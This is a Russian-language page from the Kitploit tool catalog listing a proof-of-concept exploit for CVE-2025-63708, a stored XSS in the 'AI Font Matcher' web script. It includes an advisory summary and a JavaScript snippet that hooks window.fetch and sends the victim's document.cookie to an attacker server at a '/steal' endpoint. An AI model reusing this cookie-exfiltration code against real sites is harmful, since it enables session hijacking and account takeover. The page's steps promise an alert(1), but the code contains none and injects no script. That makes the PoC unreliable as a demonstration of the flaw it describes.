Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-63708 — Эксплойт доказательства концепции для CVE-2025-63708, уязвимости хранимого XSS в AI Font Matcher. Демонстрирует кражу сессионных cookie через несанитизированные имена семейств шрифтов в ответах на запросы веб-шрифтов. | Kitploit
Инструменты/GitHubGitHub/dylandavis1/cve-2025-63708
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Эксплойт доказательства концепции для CVE-2025-63708, уязвимости хранимого XSS в AI Font Matcher. Демонстрирует кражу сессионных cookie через несанитизированные имена семейств шрифтов в ответах на запросы веб-шрифтов.

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-63708

Идентификатор CVE: CVE-2025-63708
Назначено: 11-12-2025 Тип проблемы: CWE-79 (Межсайтовый скриптинг)
Затронутый продукт: “AI Font Matcher” (опубликовано 2025-10-10, nid=18425)
Страница продукта: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Дата обнаружения: 2025-10-11
Исследователь: Dylan Davis

Краткое описание

Приложение обрабатывает данные из запроса webfonts без санитизации названий семейств шрифтов. Злоумышленник, контролирующий или перехватывающий этот ответ, может внедрить JavaScript, который выполняется в контексте страницы, что позволяет похитить сессионные cookie и захватить учетную запись.

Воздействие

  • Произвольное выполнение JavaScript в браузере жертвы
  • Экфильтрация сессионных cookie (в ходе тестирования наблюдались не-HttpOnly cookie)
  • Угон учетной записи и выполнение действий от имени пользователя

Затронутые версии / Область

  • Пакет “AI Font Matcher”, распространяемый на SourceCodester по состоянию на 2025-10-10.

Воспроизведение (PoC)

Эта PoC демонстрирует выполнение кода путем перехвата window.fetch и возврата контролируемой полезной нагрузки веб-шрифтов.

  1. Запустите приложение локально из загруженного исходного кода.
  2. Откройте DevTools → Консоль и вставьте приведенную ниже PoC (или загрузите poc.js).
  3. Запустите интерфейс, который выполняет запрос webfonts; наблюдайте alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Скачать инструмент